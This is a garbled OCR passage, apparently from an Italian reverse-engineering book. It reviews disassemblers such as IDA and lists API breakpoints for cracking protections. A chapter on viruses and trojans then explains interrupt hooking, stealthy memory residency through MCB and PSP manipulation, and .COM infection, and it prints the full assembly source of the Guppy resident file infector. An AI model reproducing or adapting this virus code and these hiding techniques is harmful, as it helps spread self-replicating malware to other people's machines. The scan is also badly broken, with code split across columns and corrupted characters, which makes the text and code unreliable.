Cu LC) 19 Ar Ma IE TORIR I ; Me lo ricordo almeno dal 1987 
Copuriaht: (€) ? I. All rights reserved. quando era sicuramente uno dei 
g DunpNE (nay take a feu ninutes) | pochissimi (se non l’unico). 

PE rodi In tutti questi anni ha 
Drpod reroaree to MMI o mantenuto —la —1stessa 
Done -- INRAM1.udf -- run ‘“sourcer*sr HINRAN"1.udf interfaccia in ambiente DOS 
nella quale è possibile 
specificare tutti i parametri 
reativi alla metodologia di 
visualizzazione e di analisi dei 
programmi. 
La traduzione dei sorgenti assembler 
relativi a prohgrammi Windows deve 
avvenire mediante due programmi forniti 
nel pacchetto. 
Il primo esegue una prima analisi di 
questo tipo di programmi. 
WINP esegue un preprocessing del file 
eseguibile eseguendo il dump NE e usando 
file .DTA forniti con il pacchetto per la 
creazione di un modulo utilizzabile da 
SOURCER vero e proprio. 
Il programma creato prende l’estensione 
WDF. 
SOURCER dispone di alcuni flag che permettono di specificare il formato del file 
ottenuto (.lst o .asm), di specificare il tipo di formattazione e le 
informazioni riportate ( codici operativi a fianco istruzioni ecc.) 
Inoltre è possibile settare molti flags relativi al tipo di analisi eseguita. 
Nella maschera principale il comando (T) permette di specificare il TARGET 
ASSEMBLER che può essere relativo a MASM 5.0, MASM6.1, TASM e tanti altri. 
E’ inoltre possibile specificare il numero di passate (fate attenzione che un 
numero maggiore non euivale ad una miglior interpretazione), il tipo del 
processore e tante altre cose. 
Il RE comunque rimane IDA che è possibile trovare in tante versioni tra cui una 
didattica FREEWARE. 
Chiaramente non ho mai parlato della difficoltà di reperire il software in 
quanto penso che sia proprio l’ultimo dei problemi. 
IDA è fantastico. 
In tutti i lavori ho sempre creato un sergente con IDA di cui le parti più 
significative le ho stampate. 
I parametri relativi alla creazione dei sorgenti sono svariati come svariate 
sono anche le funzioni per la visualizzazione e la ricerca di certi punti. 
Questo a fianco è un collage con le principali opzioni presenti nei menu di IDA 
3.84 (l’ultima alla data di settembre 1999). 


V COMMUNICATIONS, INC. 


Enter ‘input filename: 


IDA, non mi stanco di 
ripeterlo, è sicuramente il 
migliore come disassemblatore. 
4 rampa La ricostruzione del sorgente 
Empty novigatioo stock : assembler è impeccabile e 
precisa. 

Nessun disassemblatore fino ad 
ora visto raggiunge una simile 


" precisione. 
re Sme: Other Fate attenzione che parlando di 
î segments . . 
Reno tveresentationt:-* sqnest disassemblatori potremmo 
Benangled names... Se T 6 ; 
ascii stringe sigle... ait-a | | trovare la problematica di 
ASCII strings aptisas... . i . E 
Colers:== 1 ciou PA ritrovarci davanti a dei 


Setup data types alto 


Calenlate... 
Show 


Li 
internal U Mo n; 


= n cite e] 
Unhide E 
Setup hidden items... Ctri-F? 


programmi con segmenti codificati con sistemi come shrinker ecc. 

Il lavoro in questo caso deve essere fatto abbinando sapientemente il 
disassemblatore con dumper specifici che siano in grado di individuare e 
decodificare quel tipo di packer. 


; DATA XREF: sub_0_45606C+118 o 


align 4 
h SUBROUTINE 
sub_0_456244 proc near 7 CODE XREF: sub_0_453618+1E p 


7 sub_0_45498C+3 p 
mov ds:dword_0_45B078, 20h 
push offset dword_0_45B078 
call j GlobalMemoryStatus 
mov eax, ds:dword_0_45B084 


sub_0_456244 endp 


L'esempio precedente è una routine disassemblata da IDA. 

IDA inoltre riesce a disassemblare un numero abbastanza elevato di processori 
differenti da quelli della famiglia Intel, anche se questa non è sicuramente una 
delle caratteristiche che ci interessano. 

Il risultato dell’analisi tra i tre disassemblatori possiamo riassumerlo molto 
semplicemente. 

WDASM mantiene il miglior rapporto prestazioni/funzioni in quanto permette di 
debuggare e di avere il disassemblato migliore di quanto lo sia quello di 
SoftiIce. 

Chiaramente potendo avere IDA sicuramente disporrete del massimo. 

Valutazioni particolari vanno comunque fatte in relazione ai disassemblatori 
quando incontrano programmi protetti. 

Chiaramente avere un ottimo sorgente assembler può essere un aiuto anche se la 
cosa principale è quella di avere sempre sott’occhio i valori derivati 
dall’elaborazione. 


RIASSUNTO DELLE FUNZIONI PIU’ UTILIZZATE NELLE RICERCHE 


Funzioni per lettura e scrittura in files 


ReadFile 
WriteFile 


Funzioni per la richiesta di informazioni sui file 
SetFilePointer 


GetSystemDirectory 
GetSystemDirectoryA 


Per la lettura o scrittura in file .ini 
Per aplicazioni a 16 bits 
GetPrivateProfileString 
GetPrivateProfileInt 


WritePrivateProfileString 
WritePrivateProfileInt 


32 bits 

GetPrivateProfileStringA 
GetPrivateProfileIntA 
WritePrivateProfileStringA 
WritePrivateProfileIntA 

Accesso ai file ramite interrupt 


bpint 21 if (ah==3d) 
bpint 2f if (ah==01) 


Funzioni per il registro 
Creazione voci 


RegCreateKey 
RegDeleteKey 


RegCreateKeyA 

RegDeleteKeyA 

Lettura e scrittura valori 
RegQueryValue 

RegQueryValueA 

Apertura e chiusura chiavi registro 


RegCloseKey 
RegOpenKey 


RegCloseKeyA 
RegOpenKeyA 


Dialog Boxes 
Lettura testo e interi 


GetWindowText 
GetDlgItemText 


GetWindowTextA 
GetDlgItemTextA 


GetDlgItemInt 
Apertura MessageBox 
MessageBox 
MessageBoxA 
MessageBoxExA 
MessageBeep 


Altri metodi per visualizzare e preparare testi 


SENDMESSAGE 
WSPRINTF 


Creazione windows, dialogs e altre varie 


DialogBox 
DialogBoxParam(A) 
CreateWindow } 
Showwindow } Mole 
Funzioni per il tempo 


GetSystemTime 
GetLocalTime 


SystemTimeToFileTime 

Generazione Window 

createwindow 

createwindowexa 

showwindow 

bitblt (a type of memory move, similar to hmemcpy) 


CD-ROM Calls 


GetDriveType (if eax=5 then it is a cdrom check) 
GetDriveTypeA 


GetDriveType Return Function codes: 


Value Meaning 
0 Drive Cannot Be determined 
1 Root Dir Does not exist 
2 DriveRemoveable 
3 A Fixed Disk (HardDbrive) 
4 Remote Drive(Network) 
5 Cd-Rom Drive 
6 RamDisk 
GetLogicalDrives 
GetLogicalDrivesA 


GetLogicalDriveStrings 
GetLogicalDriveStringsA 


Altre informazioni CDROM 

interrupt 2f is the mscdex interrupt 
bpint 2f, al=0 ah=15 checks if mscdex installed 
try breaking on file accesses as well 

Input numerico sotto window 


GETWINDOWWORD 
GETWINDOWLONG 


Altri breakpoints possibili 
BOZOSLIVEHERE 

HMEMCPY 

GLOBALGETATOMNAME 


message breaks 


BMSG xxxx WM_GETTEXT (good for passwords) 
BMSG xxxx WM_COMMAND (good fro OK buttons) 


Xxxx stà per l’handle della finestra 


VIRUS E TROJAN HORSES 


Quando abbiamo parlato degli interrupts abbiamo visto che esiste la metodologia 
per leggere l’indirizzo di uno d questi e per settare una nostra routine come 
vettore d’interruzione. 

Inoltre mediante l’interrupts di timer è possibile creare processi concorrenti a 
quelli esistenti o in ogni caso è possibile intercettare eventi ed attivare 
procedure residenti. 

Molti interrupts controllano le varie periferiche e quindi quando capita un 
evento questi vengono richiamati con particolari codici di servizi, normalmente 
settati nei registri, che noi possiamo intercettare e quindi agire di 
conseguenza. 

Il volume che avevo scritto nel 1986 trattava questo tipo di programmi per cui 
chi volesse approfondire l'argomento lo posso rimandare a questo. 

In questo volume ci interessa l'argomento solo per il fatto che tramite questa 
tipologia di programmi possiamo creare cavalli di troia per inserire ne9i 
sistemi programmi atti al controllo di questi. 

Vedi il famoso BACK ORIFICE che viene installato da un altro programma e da quel 
momento in avanti permette ad un sistema remoto di controllare il computer 
ignaro di avere BO installato. 

Un programma residente in memoria (TSR - Terminate and Stay Resident) è un 
programma che lascia una porzione di se stesso in memoria. 

Normalmente è composto da due parti e precisamente la parte che legge e salva 
gli indirizzi dei vecchi interrupts e quella che viene settata come nuova 
porzione residente. 

Come dicevo prima un programma residente, grazie all’interrupt di timer, può 
essere sempre attivo in concorrenza con gli altri programmi caricati oppure può 
essere disattivo in attesa di un vento che lo faccia entrare in funzione. 

Ad esempio potremmo salvare l’interrupt del disco, settare l'indirizzo della 
nostra routine come nuovo indirizzo dell’interrupts. 

Dentro al nostro programma potremmo controllare per quale motivo è stato 
richiamato l’interrupts e successivamente rilanciare l’esecuzione alla vecchia 
procedura o eseguire qualche cosa di nostro. 

Il flusso sarebbe 


Salva vecchio indirizzo 
INT 


Setta indirizzo nostra 
Chiamata funzione 
Asincrona 


No. Richiama vecchio 
INT. 


Nostra funzione. Ci interessa 


Si. Esegui nostra 
funzione. 


Molti TSR (utili) potevano essere attivati con certi tasti (CTRL+ALT+1) e quindi 
modificavano in modo da poterlo intercettare l’interrupt di tastiera. 


Altri attendevano un evento sulla seriale. 

Insomma. 

Possono essere 100.000 i motivi che possono attivare un TSR. 

Tanti anni fa, quando scrissi il volume legato all’uso degli interrupts mediante 
C fu detto che lo scopo era quello di scrivere virus. 

Voglio precisare che anche se le tecniche riportate su questo volume sono 
utilizzabili per scopi maldestri il vero scopo è quello di vedere il lato 
tecnico in quanto, io personalmente, non utilizzerei mai e poi mai un virus per 
rompere le scatole al prossimo. 

La cosa interessante è l’indieme di metodologie legate a questo argomento. 

Per un po ho pensato di non inserire questa parte nel volume ma poi alla fine le 
argomentazioni erano troppo interessanti per essere tralasciate. 

MCB, PSP e DTA sono i condimenti per questo capitolo. 

Un virus deve sfruttare il basso livello visto che non può sfruttare librerie e 
cose simili che facciano divenire un programma di 2000 bytes uno di 30 Mbytes. 
Non è possibile fornire un setup e un CD per installare un virus pYer cui se 
deve allocarsi memoria senza farsi accorgere deve andare a vedere come è 
strutturato il MCB e deve modificarselo. 

Ripeto che desidererei fosse vista solo la componente tecnica dell’argomento. 
Nel limite del possibile usate le teorie per scrivere programmi utili che 
lasciandoli tra il PD software potebbero condurvi a quel bricciolo di notorietà 
che un virus non vi può dare (a meno che non siate tanto fessi da scrivere sul 
virus ((C)Copyright di xxxxx). 

Se decideste di farlo datevi un occhiata alle spalle prima di entrare in casa ! 
Anche i virus si basano su questa tecnica al fine di rimanere residenti in 
memoria. 

La prima parte di un software di questo tipo è quella che esegue il salvataggio 
Come abbiamo detto nell'apposito capitolo, un interrupts è sostanzialmente una 
funzione del BIOS o del DOS che un programma può richiamare. 

Esistono due funzioni del principale interrupt DOS (INT 21h) che permettono di 
leggere e di settare gli indirizzi di dove si trova il corpo di un interrupt. 
Lre funzioni sono precisamente le 


AH 
AL 


35h (Get Interrupt Vector) 
Interrupt Number 


I valori di ritorno sono 


AX = Unchanged 
ES = Interrupt Handler Segment 
BX = Interrupt Handler Offset 


La funzione dell’int 21h che invece setta un interrupt è 


AH = 25h (Set Interrupt Vector) 
AL = Interrupt Number 

DS = New Handler Segment 

DX = New Handler Offset 


jAssume that DS = CS as in a .COM file. 


Il seguente sepzzone di codice richiede l’indirizzo di un interrupt, lo salva e 
lo risetta con un altro codice. 


Get_Interrupt_Address: 


Mov ax,3521h ;Get Old Int 21h Address 

int 21h 

mOV word ptr [Int_21 Segment],es ;Save old address 
mov word ptr [Int_21 Offset],bx 


Set_Interrupt_Address: 
Mov ax,2521h 


mov dx,offset Int_21 Handler ;DS:DX = Int_21 Handler 
int 21h jSet the new handler 


Int_21 Handler: 


cmp ah, 4bh ;Check for activation 
je execute_a_program ;conditions by looking 
cmp ah, 3dh jat the function numbers 
je open_a_file ;of Int 21 that you wish 


;to intercept. Make sure 
;to save any registers that 
jyou change inside the 


Go_Int_21: 

db Qeah ;This simulates a far jump 
Int_21_ Offset dw (0) ;to the old interrupt handler. 
Int_21 Segment dw (0) ;(OEAh is code for a far jmp.) 


Ricordatevi sempre che un interrupt può essere chimato in qualsiasi momento per 
cui al suo ritorno l’ambiente deve essere esattamente come quando è stato 
chiamato. 

Questo significa che devono essere salvati tutti i valori dei registri che 
verranno modificati dal codice dell’interrupt. 

Oltre a questo bisogna stare atenti che l’interrupt non richiami funzioni che 
tocca direttamente. 

Se ad esempio il vostro interrupt modifica la funzione 8DH dell’int 21H è buona 
cosa che non la richiami. 

Al contrario può invece fare riferimento agli indirizzi che ha precedentemente 
salvato. 


Call_Int_21h: 


pushf ;jpush the flags and perform 
call dword ptr [Int_21 Offset] ;a far call to simulate an 
;INT call. 


Avevamo detto che i primi 1024 bytes contengono gli indirizzi dei 256 possibili 
interrupts. 

Un metodo alternativo per cambiare e leggere i vettori d’interrupt stà 
nell’andare a modificare direttamente gli indirizzi in quella tabella. 


Set_DS_to_ Table: ;DS = 0 
xor ax, ax 
MOV ds, ax 
Hook_Int_21: 
mov ax,offset Int_21 Handler ;ax = Handler Offset 
Mov bx, cs ;bx = Handler Segment 
cli ;clear interrupts 
xchg ax,word ptr ds:[84h] ;Set AX = Old handler offset 
;and set new offset. 
xchg bx,word ptr ds:[86h] ;Set BX = Old handler segment 
;jand set new segment. 
mov word ptr cs:[Int_21 Offset],ax 
MOV word ptr cs:[Int_21 Segment],bx 
sti ;restore interrupts 
push CS 
pop ds ;restore DS = CS 


Una delle funzioni che potrebbe eseguire il codice è quella dell’allocazione di 
memoria per il codice del programma stesso e la terminazione per fare rimenere 
residente il codice. 


L'uso dell’int 27h potrebbe creare problemi avvisando l’utente ignaro che c’è 
qualche cosa che non va. 

Dall'analisi del codice del virus Armageddon è possibile vedere facilmente un 
metodo alternativo. 

Un altro problema è legato alla ricerca di uno spazio di memoria non utilizzato 
dove inserire il codice. 

La memoria video (0b000/0b800) dedicata al monocromatico potrebbe andare bene 
anche se questo può essere utilizzato da codici molto corti. 

Un grande numero di virus utilizza il settore di boot per trovare la memoria. 
Prima che il DOS venga eseguito il BIOS salva l'ammontare di memoria bassa in 
una WORD ubicata all'indirizzo 0:413h. 

Questa WORD contiene il numero di Kbytes utilizzabili a partire da 0000:0000 e 
terminado a A000:0000. 

E’ possibile riservarsi della memoria sotraendo a questo numero il numero dei 
Kbytes utiloizzati dal virus. 

Fatto questo si trova il segmento moltiplicando il nuovo valore per 64 (40h) per 
convertirlo in paagrafi. 

Questa è mla vostra area libera dove copiare il virus. 

Eseguiamo la copia e quindi settiamo l’interrupt per puntare al suo handler. 
Quando il DOS parte considera quest area allocata e il CHKDSK ritorna il numero 
di k in meno di mememoria aseconda di quanto avete riservato. 

Questo è un esempio della tecnica. 


Get_Current_Amount: 


xor ax, aX 
MOV ds, ax 
mov ax,word ptr ds:[413h] ;ax = memory in K 


Reserve_Memory: 


dec ax 

mov word ptr ds:[413h], ax ;lower memory by 1K 
Calculate_Free_Segment: 

mov cl, 06 

shl ax,cl ;AX = AX * 64 

mov es, ax ;ES:0 is now the beginning 


;of free memory. 


Sfortunatamente il metodo precedente funziona solo con il DOS letto o perlomeno 
non funziona bene in certe circostanze. 

Per superare il problema ci si può basare sulla metodologia che il DOS usa per 
la gestione della memoria, ovvero tramite MCB (Memory Control Blocks) e tramite 
PSP (Program Segment Prefix). 

Quando un file viene letto per essere eseguito il DOS riserva la memoria 
necessaria per il file e la fa precedere da un header di 16 bytes chiamato MCB. 
Questo header informa il DOS sul proprietario del blocco di memoria, della 
dimensione e se quello è l’ultimo blocco della catena o no. 

Il DOS legge una tabella di 256 bytes chiamata PSP immediatamente dopo al MCB. 
Il PSP è fondamentalmente una tabella di informazioni per il DOS la quale 
include la locazione del top relativo alla memoria alta usabile da questo. 
Questo contiene anche il DTA, il FCB e la command line del programma. 

Vedremo che esistono funzioni relative alla creazione del DTA al fine di non 
utilizzare quello interno al PSP nel caso in cui si gestisca il tutto da 
programmi virus. 

Se il programma è un .COM esso verrà letto ed eseguito con CS:0 uguale 
all’inizio del PSP mettendo l’inizio del file ad un offset di 100h. 
Ricordiamoci che i .COM utilizzando un solo segmento per tutto non necessitano 
di header particolari. 

Se il programma è un .EXE l’inizio del file verrà letto a CS:0 dove CS è 10h 
più grande del segmento del PSP. 

Questo è importante da ricordare quando si cerca di modificare il PSP dal 
programma. 


Il MCB è 10h più basso in memoria del PSP, o un segmento in meno. 
La struttura della tabella completa è la seguente. 


Memory Control Blocks 


Offset Name Length (Bytes) Description 
0 Location 1 M=Last Block, Z=Not Last 
1 Owner 2 Segment of start of Memory 
3 Size 2 Length in Paragraphs 
5 Unknown 3 Supposedly Reserved 
8 Owner 's Name 8 Name. Appears in mem maps 
Program Segment Prefix 
Offset Name Length (Hex Bytes) Description 
00 Terminate 2 CD20 (Int 20) 
02 Top of Memory 2 Usually set at A000. 
-- Sometimes needed to 
-- lower DOS's memory for 
-- a virus. 
04 Unknown 1 Supposedly Reserved. 
05 CPM stuff 5 Obsolete 
0A Exit to DOS 4 Int 22h handler (IP:CS) 
OE Control C Handler 4 Int 23h handler (IP:CS) 
12 Critical Error 4 Int 24h handler (IP:CS) 
16 Parent ID 2 Segment of Parent Prog. 
18 Handle Table 14 One byte/handle 
2C Environment Segment 2 Segment of Envir. Vars. 
2E User Stack 4 Stack address 
32 File Handle Count 2 Size of Handle Table 
34 Handle Table Address 4 If not at 12h 
38 Unknown 1c Supposedly Reserved 
50 Dos Call and RET 3 INT 21, RET 
53 Unknown 9 Supposedly Reserved 
5C FCB 1 10 File Control Block 
6C FCB 2 10 dal 
7C Unknown 4 Reserved 
80 Command Line Length 1 Also used as the 
81 Command Line 7f default DTA. 


Usando qeste informazioni ci sono due modi per diventare residenti. 

Il primo è quello di dire al DOS che il top della memoria è uno o due kbytes in 
meno abbassando la memoria MCB fino a farlo corrispondere e quindi abbassando 
anche la memoria del BIOS come mostrato prima. 

Questo metodo permette al virus di diventare residente usando una piccola 
porzione di codice e evitando di essere listato dalla MEM’s list. 
Sfortunatamente l’abbasamento della memoria è evvidente usando programmi che la 
vanno a leggere (CHKDSK ecc.). 

L'altro metodo è quello di creare un altro memory block cme l’altro e settando 
come proprietario se stesswo o al limitre il command.com. 

Questo può essere fatto anche con funzioni dedicate alla memoria del DOS. 
Vediamo il metodo in cui si abbassa il top della memoria nel campo del PSP e poi 
abbassando la memoria del DOS. 


;This example assumes .COM file structure where DS = CS = PSP. 


Get_And_Lower_Top_Of_Memory: 


mOV ax,word ptr ds:[02] ;Get Top of Memory (PSP) 
sub ax,40h ;Lower it by 1K (40h paragraphs) 
mov word ptr ds:[02],ax ;And Replace Value. 


Get_MCB_Segment: 
Mov ax, ds ;AX = CS = DS 


dec ax ;Get Segment of MCB 
Mov ds, ax ;And put into DS 


Shrink_Block: 
sub word ptr ds:[03],40h ;Subtract 1K from host's MCB 
;allocation (paragraphs) 
Allocate_From_Bios: 


xor ax, ax 

MOV ds, ax ;DS = 0 

dec word ptr ds:[413h] ;Allocate 1K from Bios 
Find_Free_Segment: 

MOV ax,word ptr ds:[413h] ;Get memory in 1K 

Mov cl,6 

shl ax,cl ;change to segment (multiply 


;jby 64 or 40h) 


;AX now equals free segment 
;of memory 


mov es, ax ;Set ES = Free Segment 


L'allocazione tramite funzioni DOS è spesso il metodo utilizzato dagli scrittori 
di virus. 

Per fare questo si ricerca il massimo blocco disponibile chiamando la funzione 
4Ah (Modify Memory Allocation) dell’ INT 21h con una richiesta in paragrafi di 
offffh. 

Dato che questo è impossibile la funzione setta il carry flag nel processore ed 
inserisce il massimo di memoria disponibile in BX. 

Sotraete a questa la dimensione dei paragrafi che desiderate (+1 per sicurezza) 
ed eseguite nuovamente la funzione 4Ah con il nuovo valore in BX. 

Questo riserverà sufficente spazio per il virus al top della memoria. 

A questo punto utilizzate la funzione 48h (Allocate Memory) con BX settato al 
numero di paragrafi voluto senza quel +1 di prima. 

La funzione restituirà in AX il segmento di memoria libera. 

Ora si dovrà settare il nuovo blocco come l’ultimo della catena settando i primi 
bytes del MCB a ‘Z’ cambiando anche il proprietario. 

I proprietario è usualmente un valore a word corrispondente al program’s PSP 
(MCB Seg+t1). 

Questo dovrebbe funzionare oppure dovrete settarlo con un valore riservato tipo 
08 (I/0). 

Dopo che questo è stato fatto, se volete, potete settare il nome del 
proprietario nel campo che parte a MCB_SEG:0008 con un nome al massimo di 8 
bytes. 


Get_Maximum_Memory: 


mov ah,4ah 
mov bx,Offffh ;Request too much 
int 21h jmemory - maximum size 
jreturned in BX. 
Subtract_Needed_Memory: 
sub bx, ((end_vir-start_vir+0fh)/10h)*2+1 ;Shrink Block by 
;(virsize*2)+1 


Shrink_Block: ;BX = Paragraphs 
MOV ah,4ah ; Requested 
int 21h ;ES = Segment of Block 
Allocate_Memory: 
Mov ah, 48h 
MOV bx, ((end_vir-start_vir+0fh)/10h)*2 ;Allocate (virsize*2) 


int 21h ;Returns AX = Free Seg 


Point_ES_to_New_MCB: 


dec ax 
mov es, ax 
inc ax 


Set_As_Last_Block: 
MOV byte ptr es:[0],'Z' ;Mark as last 
jin chain 
Set_0Owner: 


;Note: The number in the Owner field is usually the segment of the program's 
; PSP. Certain values, however, have special meanings. 08, for example, 
hi indicates I/0 or Command.COM as the owner. This can be useful for 
; deceptions. The only requirement of this is that the owner will NOT 
5 be deallocated. 


MOV word ptr es:[1],ax ;Set owner as itself. 


Set_Name: 
;Note: This is not necessary, but it can be used for many purposes. 


MOV di, 08 ;ES:DI = owner name 
;DOS 4+ 

mov si, offset virname 

push CS 

pop ds 

mov Cx,4 

repnz MOVSW ;Copy name into field. 


;This will show up in programs like MEM and 
;System Information. 


RTRT I FACTO ;Continue program, hook interrupts, etc. 
virname db 'reMEMber ' 


La manipolazione diretta è simile come fine a quella eseguita con il DOS ma con 
passi differenti. 


Un vantaggio di questo metodo è che uno può determinare che cosa permettere al 
DOS di visualizzare. 
Il codice è il seguente. 


Get_Maximum_Memory: 


Mov ax, ds 

dec ax 

Mov ds, ax ;DS = MCB 

MOV bx,word ptr ds:[03] ;Get Block Size 


Subtract_Needed_Memory: 
sub bx, ((end_vir-start_vir+0fh)/10h)*2+1 ;Shrink Block by 
;(virsize*2)+1 
Shrink_Block: 


MOV word ptr ds:[03h],bx ;Lower Block Size 
;Note: If you want your program to show up in a memory map, set this byte 
è to 'M', meaning that it is NOT the last block. Otherwise, set it 
; to 'Z' so that MEM and like programs will not trace past it. 

MOV byte ptr ds:[0],'M' ;Mark host block's 


;location in chain. 


Lower_Top_0Of_Memory: ;Lower field in PSP 


sub word ptr ds:[12h],((end_vir-start_vir+0fh)/10h)*2+1 
Point_ES_to_New_MCB: ;Get New top of mem 

MOV ax,word ptr ds:[12] ;from PSP. 

mov es, ax ;ES = new segment. 


Set _As_Last_Block: 


MOV byte ptr es:[0],'Z' ;Mark as last 
jin chain 
Set_Owner: 
MOV word ptr es:[1],ax ;Set owner as itself. 


Uno dei problemi, che vedremmo in modo più dettagliato alla fine del capitolo, 
riguarda l’autoriconoscimento del virus. 

Questo serve a fare in modo che il codice sappia riconoscere quali programmi 
sono già stati toccati. 


Install_Check: 


MOV ax, 0deadh 

int 21h ;jIs it installed? 

cmp ax, 0deadh 

je Already_Installed ;Yes? jump to Already_Installed 
Install: ;jotherwise install it. 


Int_21 Handler: 


cmp ah, 4bh 
je execute 
cmp ah, 3dh 
je open 
cmp ax, 0deadh jIs it an install check? 
je Install Check ;Yes, jump to Install Check. 
Go_Int_21: 
db dea 
Int_21_IP dw (0) 
Int_21_CS dw (0) 
Install_Check: jSave value in AX 
iret 


Il codice che segue comprende anche il codice di inoculazione del virus. 
Si tratta di un codice completo relativo al GUPPY VIRUS. 


CEAEZEZZZZZZZZZAZZZIZZIZIZIZZIZIZIZZIZZZIZZZIZZZZZIZZIZIZIZZIZZZZIZZIZZZZZZIZZZIZZZZZZIZZZIZIZIIELI 


The Guppy Virus * 
1 BKAKKKKAKKAKKAKAKKAKKAKKAKKAAKKAKKAKKAKAKKAKKAKKAAKKAKKAKKAKAKKAKKAKKAAKKAKAKKAKAAKKAKKAKKAAKAKKAAKKAKAKAKKAKKAAKKAKKAKAKAA 
The Guppy virus is a relatively simple, very small, resident .COM * 
;*infector. It uses the standard way for a regular program to go resident * 
;*(i.e. Int 27) which makes the infected program terminate the first time * 
;*run. After that, however, infected files will run perfectly. This virus* 


;*uses interesting methods to restore the storage bytes, as well as a i 
;*strange technique to restore control to an infected file after it has * 
;*already gone memory resident. * 
i * 


, 
"KKAKKKKKKAKKAKKAKAKKKAKAKAKAKAKAKAKAKAKKAKAKAKKAKAKAKAAKAKAKAKAKAKAKAKAKAKKAKAKAKAAKAKAAKAKAAKAKAAKAKAAKAKAAKAKAKAKAAKAKAKAKAKAAKAKAAAAA 
, 


.model tiny 
.radix 16 
. code 


org 100h 


start: 
call Get_Offset 


Get_Offset: 

pop si ;SI = offset of vir + 
;(Get_Offset-Start) 

mov ax,3521h 

mov bx, ax 

int 21h ;Get Int 21 Address 

mov ds:[si+Int_21_ Offset-103],bx ;Save old Int 21 

MOV ds:[si+Int_21 Segment-103],es 

jmov dx, si ;Bytes vary between assemblers 

db 89,0f2 

; add dx, offset Int_21_ Handler-104 

db 83,0c2,1f 

mov ah, 25h 

int 21h ;Set Int 21 

inc dh ;Add 100h bytes to go resident 
;from handler 

push CS 

pop es 

int 27h ;Terminate & stay resident 


;DX+1 = end of area to go res. 


Int_21 Handler: 


cmp ax,4B00h jIs call a Load & Execute? 

je Infect ;iYes? Jump Infect 

cmp al,21h ;Might it be a residency check? 
jne Go_Int_21 ;No? Restore control to Int 21 
;cmp ax, bx jAre AX and BX the same? 

db 39, 0d8 

jne Go_Int_21 ;No, Restore control to Int 21 


push word ptr [si+3dh] ;3dh = offset of Storage Bytes - 
;Get_Offset 


;jThis gets the first word of 
;storage bytes, which is then 
jpopped to CS:100 to restore it. 


mov bx, offset ds:[100] ;100 = Beginning of COM 

pop word ptr [bx] 

MOV cl, [si+3Fh] ;Restore third storage byte. 
MOV [bx+2],cl 


Restore_ Control: 


pop cx 

push bx 

iret ;Jump back to Host program. 
Storage Bytes db 0, 0, 0 


Infect: 


push 
push 
push 
push 
mov 
int 


xchg 
call 


Get_Offset_Two: 


Close File: 


pop 
push 
pop 
mov 
mov 
sub 


i mov 
db 


int 


cmp 
jne 
mov 
xor 
xor 
int 
xchg 
mov 
mov 


i mov 
db 


sub 
int 
mov 
xor 
xor 
int 
mov 


; sub 
db 


MOV 
MOV 


i mov 
db 


int 
mov 
int 


pop 


ax,3D02h 
21h ;jOpen File for Read/Write Access 


ax, bx 
Get_Offset_Two 


si,10 ;Set SI=Storage_Bytes 


21h ;Read first 3 bytes of file 


byte ptr [si], 0E9h ;jIs the first command a jump? 
Close_File ;No? Jump to Close File 
ax,4202h 

dx, dx 

CX, CX 

21h ;Go to end of file 


ax,di 
ah, 40h 
cl,98h jVirus Size 


dx, si 
89,0f2 


dx, 40h ;Beginning of virus 
21h ;Append virus to new host 


ax,4200h 

CX, CX 

dx, dx 

21h ;60 back to beginning of file 
cl,3 


di, cx 
29, 0cf 


[si+1],di 
ah, 40h 


dx, si 
89, 0f2 


21h ;jWrite 3 byte jump to file 
ah, 3Eh 
21h 


ds 


pop dx 


pop bx 
pop ax 
Go_Int_21: 
db OEANh ;Go On With Int 21 
Int_21 Offset dw ? 
Int_21 Segment dw ? 
end start 


RAEZZZZZZZZAZAZZZZIAZZZIZZZIZIZIZZIZZZIZZZIZZZZZIZZIZZIZIZZIZZIZZZZIZZIZZZIZZZIZZZZZZZZZIZZEA LI 
, 


Vediamo ora di approfondire alcuni concetti legati ad altri punti legati ai 
virus. 

Alcune informazioni legate alla struttura del virus sono essenziali per la 
comprensione di altri punti che vedremo a breve. 

Un virus può essere diviso in tre parti : il replicatore, l’ocultatore e la 
bomba. 

Il replicatore controlla il rapporto del virus con gli altri files, l’ocultatore 
cerca di no farlo scoprire mentre la bomba esegue quello che deve fare il virus 
quandeo si verifica la condizione di attivazione. 

Il lavoro del replicatore è quello di installare il virus nel sistema su cui si 
trova. 

Il replicadore deve quindi diffondere il virus nel sistema senza distruggere i 
files che va a contaminare. 

Il modello più semplice è quello, come abbiamo fgià visto, che serve ad 
infettare i files .COM. 

Il virus per prima cosa salva i primi bytes del file da infettare, quindi salva 
una prima porzione di codice ed infine salva il rimanente alla fine. 


Failla aaa + titan + 
|P1 | P2 | |vi | V2 | 
*aetalaie ea + Parise + 
Il file infettato Il codice del virus 


Nel diagramma P1 è la prima parte del file, P2 la seconda mentre V1 e V2 sono la 
prima e la seconda parte del virus. 

Notate che la parte P1 deve essere della stessa dimensione di V1 mentre la 
seconda parte, P2, può essere vanche di dimensioni diverse da V2. 

Il virus prima salva P1 e lo copia alla fine del file oppure dentro al codice 
del virus stesso. 

Assumiamo che esegua la copia alla fine del file. 

In questo caso il diagramma diventa. 


Il problema ora è : che cosa fanno V1 e V2 ? 
V1 trasferisce il controllo del programma a V2. 
Il codice è molto semplice 


JMP FAR PTR Duh ; Takes four bytes 
Duh DW V2 Start ; Takes two bytes 


Duh è un far pointer (Segment:0ffset) che punta alle prime istruzioni di V2. 
Notate che il valorew di Duh deve essere cambiato per riflettere la lunghezza 
del file che è infettato. 

Per esempio, se la dimensione originale del programma è 79 bytes, Duh deve 
essere cambiato in modo che l'istruzione a CS:[155h] sia eseguita. 

Il valore di Duh è ottenuto aggiungendo la lunghezza di V1, la dimensione 
originale del file infettato, e 256 (PSP). 

In questo caso, V1 = 6 e P1 + P2 = 79, quindi 6 + 79 + 256 = 341 decimale (155 
hex). 

Un modo alternativo, più complicato da comprendere è il seguente 


DB 1101001b ; Code for JMP (2 byte-displacement) 
Duh DW V2_ Start - OFFSET Duh ; 2 byte displacement 


Questo inserisce un salto all’offset direttamente dentro al codice seguente. 
Si deve anche sostituire la seconda linea con 


DW V2_Start - $ 


V2 contiene il resto del codice. 

L'ultima parte di V2 copia P1 su V1 (in memoria e non su disco) e quindi 
trasferisce il controllo all’inizio del file (in memoria). 

Il programma originale verrà eseguito come se nulla gli fosse stato attaccato. 
Anche in questo caso il codice è semplice: 


MOV SI, V2_START 
SUB SI, V1 LENGTH 
MOV DI, 0100h 

MOV CX, V1 LENGTH 
REP MOVSB 

MOV DI, 0100h 

JMP DI 


V2_START is a LABEL marking where V2 starts 

Go back to where P1 is stored 

All COM files are loaded @ CS:[100h] in memory 
Move CX bytes 

DS: [SI] - ES:[DI] 


